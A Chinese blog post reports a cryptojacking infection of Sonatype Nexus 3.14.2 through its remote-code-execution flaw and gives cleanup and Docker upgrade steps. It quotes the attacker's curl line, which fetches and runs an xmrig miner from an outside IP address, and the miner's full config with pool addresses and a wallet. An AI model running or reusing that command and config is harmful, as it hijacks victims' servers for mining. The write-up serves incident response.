Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞
发现被执行的程序在xmrig在 /var/tmp/目录下 ,脚本文件内容为以下:
curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &
config.json内容如下:
{
"algo": "cryptonight",
"api": {
"port": ,
"access-token": null,
"id": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"asm": true,
"autosave": true,
"av": ,
"background": true,
"colors": true,
"cpu-affinity": null,
"cpu-priority": ,
"donate-level": ,
"huge-pages": true,
"hw-aes": null,
"log-file": null,
"max-cpu-usage": ,
"pools": [
{
"url": "202.144.193.8:80",
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -,
"tls": false,
"tls-fingerprint": null
},
{
"url": "185.161.70.34:3333",
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -,
"tls": false,
"tls-fingerprint": null
},
{
"url": "202.144.193.110:3333",
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -,
"tls": false,
"tls-fingerprint": null
},
{
"url": "205.185.122.99:3333",
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -,
"tls": false,
"tls-fingerprint": null
}
],
"print-time": ,
"retries": ,
"retry-pause": ,
"safe": false,
"threads": {
"cn": [
{
"low_power_mode": ,
"affine_to_cpu": false,
"asm": true
},
{
"low_power_mode": ,
"affine_to_cpu": false,
"asm": true
}
],
"cn-lite": [
{
"low_power_mode": ,
"affine_to_cpu": false,
"asm": true
},
{
"low_power_mode": ,
"affine_to_cpu": false,
"asm": true
}
],
"cn-heavy": [
{
"low_power_mode": ,
"affine_to_cpu": false,
"asm": true
},
{
"low_power_mode": ,
"affine_to_cpu": false,
"asm": true
}
]
},
"algo-perf": {
"cn": 2.0,
"cn/2": 2.0,
"cn/msr": 2.0,
"cn-lite": 2.0,
"cn-heavy": 2.0
},
"calibrate-algo": false,
"calibrate-algo-time": ,
"user-agent": null,
"syslog": false,
"watch": false
}
还有一个可 执行的程序
xrmrig,此程序会 导致cpu爆满
删除容器/var/tmp/目录下的文件,或者直接删除容器(当心数据丢失)然后把程序升级 ,用docker安装的升级如下:
docker pull docker.io/sonatype/nexus3 //会自动拉取最新版本
docker run -d -p : -p : --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3
Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞的更多相关文章
- struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复
Struts2 被发现存在新的高危远程代码执行漏洞,可造成服务器被入侵,只要是Struts2版本 低于 2.3.14.3 全部存在此漏洞.目前官方已经发布了最新的版本进行修复.请将stru ...
- vBulletin 5.x 版本通杀远程代码执行漏洞复现
漏洞介绍 vBulletin中存在一个文件包含问题,可使恶意访问者包含来自 vBulletin 服务器的文件并且执行任意 PHP 代码.未经验证的恶意访问者可通过向index.php发出包含 rout ...
- Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞分析和复现
0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库.其3.14.0及之前版本中,存在一处基于OrientDB自 ...
- Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现
0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库.其3.14.0及之前版本中,存在一处基于OrientDB自 ...
- ThinkPHP5 远程代码执行漏洞被入侵日志,升级最新版本解决
2018年12月9日,ThinkPHP团队发布了一个补丁更新,修复了一处由于路由解析缺陷导致的代码执行漏洞.该漏洞危害程度非常高,默认环境配置即可导致远程代码执行.经过启明星辰ADLab安全研究员对T ...
- Sonatype Nexus Repository Manager修改密码不成功
nexus修改用户密码时出现Invalid authentication ticket 搜索一下,说会修改密码操作要在15秒内完成 ,于是快速操作,没想到真成功了
- Sonatype Nexus Repository Manager清除无用的docker镜像
1.创建定时任务 2.先run一下看是否能删除无用镜像
- ECShop全系列版本远程代码执行漏洞复现
前言 问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行 漏洞分析 0x01-SQL注入 先看user.php $back_act变量来源于HTTP_R ...
- 威胁快报|Nexus Repository Manager 3新漏洞已被用于挖矿木马传播,建议用户尽快修复
背景 近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件. 值得注意的是, ...
随机推荐
- 国外优秀C/C++网站
1.https://en.cppreference.com/w/ 2.https://www.geeksforgeeks.org/ 3.https://www.tutorialspoint.com/c ...
- numpy 随机产生数字
python数据分析的学习和应用过程中,经常需要用到numpy的随机函数,由于随机函数random的功能比较多,经常会混淆或记不住,下面我们一起来汇总学习下. 1 numpy.random.rand( ...
- hdfs 安全模式介绍
1. hdfs在启动的时候现将映像载入内存,并执行edits中的各项操作,一旦在内存中建立元数据的映像,则闯进啊一个新的fsimage文件和空的编辑日志.此时namenode开始监听datanode请 ...
- mysql的大量的sleep进程解决办法
mysql的大量的sleep进程解决办法 版权声明:本文为博主原创文章,未经博主允许不得转载. https://blog.csdn.net/liuyong0507/article/detai ...
- oracle 优化or 更换in、exists、union all几个字眼
oracle 优化or 更换in.exists.union几个字眼.测试没有问题! 根据实际情况选择相应的语句是.假设指数,or全表扫描,in 和not in 应慎用.否则会导致全表扫描. sele ...
- Tomcat中的backlog参数
在linux 2.2以前,backlog大小包括了半连接状态和全连接状态两种队列大小.linux 2.2以后,分离为两个backlog来分别限制半连接SYN_RCVD状态的未完成连接队列大小跟全连接E ...
- gitlab 建立本地仓库
1.首先在gitlib上进行注册 注册与登录 为了用户的隐私,我们的私人 GitLab 平台关闭了自主注册.申请 GitLab 账号请联系工作站管理员:liuhaoyang@pku.edu.cn 初次 ...
- SAP 生产订单变更管理 OCM Order Changement Management
SAP OCM Order Changement Management 一.目的 订单变更管理系统是当我们的订单(生产订单.计划订单.采购订单)已经存在的时候,其物料主数据或销售数据有变更时,我们可 ...
- spingboot中的美女banner.txt
.::::. .::::::::. ::::::::::: ..:::::::::::' '::::::::::::' .:::::::::: '::::::::::::::.. ..:::::::: ...
- windows 10系统 上安装scrapy
1.python的安装(我已安装完) 2.pip的安装(我已安装) 3.安装twisted https://www.lfd.uci.edu/~gohlke/pythonlibs/#twisted 命令 ...